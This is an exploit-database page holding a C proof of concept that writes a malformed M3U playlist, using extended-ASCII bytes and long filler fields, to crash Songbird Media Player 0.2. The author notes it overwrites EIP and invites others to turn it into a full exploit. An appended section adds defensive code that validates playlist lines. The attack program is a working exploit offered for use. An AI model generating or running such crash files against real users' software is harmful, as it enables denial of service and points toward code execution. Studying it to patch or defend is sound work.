0day.today - Biggest Exploit Database in the World.
Songbird Media Player <= 0.2 Format String Denial of Service PoC
================================================================

/*
========================================================================
0-day Songbird Media Player <= 0.2 Format String Denial Of Service PoC
========================================================================

Songbird Media Player and lower experience a format string conversion error
when attempting to parse out malformed M3U Playlist files in which extended
ASCII exists in any field.

The problem seems to originate in the Unicode converter which kicks into effect
when extended ASCII is present in an M3U file.

It can even cause a huge spike in CPU resources, a few times mine flatlined at
99% after exploit and required a system reboot.

I don't have the time to try to turn this into an exploit, but I've seen it
overwrite EIP with some values - the string is getting converted to Unicode
prior to the error. And sometimes EIP gets randomly overwritten with values,
and sometimes the application just crashes.

For me using this exploit EIP gets overwritten with 0x35382534 = "58%4",
sometimes it's 0x3f3f3f3f and sometimes it's 0xfffffff3.

I noticed removing a file extension from the exploit causes EIP to get
overwritten more frequently.

I'm sure someone will turn this into an exploit, just credit me with my name
and email address in the exploit, I'll be more than happy.

Happy Hunting and Happy Holidays to everyone

<insert super awesome leet ascii art here>

November 2006 - Month Of Greg's Media Player Exploits :)
(I'll probably continue it into December)

Discovered and Reported By: Greg Linares GLinares.code@gmail.com
Reported Exploit Date: 11/28/2006
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char *argv[])
{
    FILE *Exploit;
    char buffer[513];   /* 512 filler bytes plus the terminating NUL */
    int x;

    printf("\n======================================================================\n");
    printf("0-day Songbird Media Player <= 0.2 Format String Denial Of Service PoC \n");
    printf("Crashes Songbird Player sometimes consumes 99%% CPU and needs reboot \n");
    printf("Discovered and Coded By: Greg Linares <GLinares.code[at]gmail[dot]com>\n");
    printf("Usage: %s <output M3U file>\n", argv[0]);
    printf("====================================================================\n\n\n");

    if (argc < 2) {
        printf("Invalid Number Of Arguments\n");
        return 1;
    }

    Exploit = fopen(argv[1], "w");
    if (!Exploit) {
        printf("\nCouldn't Open File!");
        return 1;
    }

    /* Build a 512-character run of 'A' used as filler for the fields below */
    memset(buffer, 0, sizeof(buffer));
    for (x = 0; x < 512; x++) {
        strcat(buffer, "A");
    }

    /* I haven't played around with much extended ASCII but I do know \xb5 - \xbf work */
    /* Vulgar Fractions Scare Me Too */
    fputs("#EXTM3U\r\n#EXTINF:0,0_day_Songbird_Format_String_PoC_by_Greg_Linares\xbc", Exploit);
    fputs(buffer, Exploit);
    fputs(buffer, Exploit);
    fputs("\r\nC:\\", Exploit);
    fputs(buffer, Exploit);

    /* This works as well here but sometimes EIP doesn't get overwritten and the application just crashes.
    fputs(".mp3\r\n", Exploit);
    fputs("C:\\RANDOMFILENAMEHERE\xbc\xbx\xbc\xbc", Exploit);
    fputs(buffer, Exploit);
    fputs(".mp3\r\n", Exploit);
    */

    printf("Exploit Succeeded...\n Output File: %s\n\n", argv[1]);
    printf("Questions, Comments, Feedback --> Greg Linares (GLinares.code[at]gmail[dot]com)\n");
    fclose(Exploit);
    return 0;
}

# 0day.today [2024-12-25] #
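One way a playlist loader can reject the input shape described above (extended-ASCII bytes and oversized fields) before a line reaches charset conversion or formatting. This is an added example, not Songbird's code and not from the PoC author; the function names, the 1024-byte line cap and the sample playlist are assumptions made for illustration.

```c
#include <stddef.h>

#define M3U_MAX_LINE 1024  /* assumed cap, not a value from the page */

enum m3u_verdict { M3U_OK, M3U_TOO_LONG, M3U_BAD_UTF8 };

/* Constructed sample: a lone 0xBC byte and filler in the #EXTINF title. */
const char M3U_SAMPLE[] =
    "#EXTM3U\r\n#EXTINF:0,title\xbc" "AAAAAAAA\r\nC:\\music\\ok.mp3\r\n";

/* Continuation bytes expected after lead byte c, or -1 if c cannot
 * start a UTF-8 sequence (lone 0x80-0xBF, 0xC0, 0xC1, 0xF5 and up). */
static int utf8_tail(unsigned char c)
{
    if (c < 0x80) return 0;
    if (c >= 0xC2 && c <= 0xDF) return 1;
    if (c >= 0xE0 && c <= 0xEF) return 2;
    if (c >= 0xF0 && c <= 0xF4) return 3;
    return -1;
}

/* Classify one line (terminator stripped) before any charset conversion.
 * Structural check only: overlong 3/4-byte forms and surrogates pass. */
enum m3u_verdict m3u_check_line(const unsigned char *s, size_t n)
{
    size_t i = 0;
    if (n > M3U_MAX_LINE) return M3U_TOO_LONG;
    while (i < n) {
        int tail = utf8_tail(s[i++]);
        if (tail < 0) return M3U_BAD_UTF8;
        for (; tail > 0; tail--, i++)
            if (i >= n || (s[i] & 0xC0) != 0x80) return M3U_BAD_UTF8;
    }
    return M3U_OK;
}

/* Walk a playlist buffer and count the lines that fail the checks. */
size_t m3u_count_rejected(const char *buf, size_t len)
{
    size_t bad = 0, start = 0, i, n;
    for (i = 0; i <= len; i++) {
        if (i != len && buf[i] != '\n') continue;
        n = i - start;
        if (n > 0 && buf[start + n - 1] == '\r') n--;  /* accept CRLF */
        if (m3u_check_line((const unsigned char *)buf + start, n) != M3U_OK)
            bad++;
        start = i + 1;
    }
    return bad;
}
```

A loader that accepts legacy single-byte playlists would transcode them with an explicit source charset first and run the same check on the result, and would always pass field text to formatting functions as an argument, never as the format string.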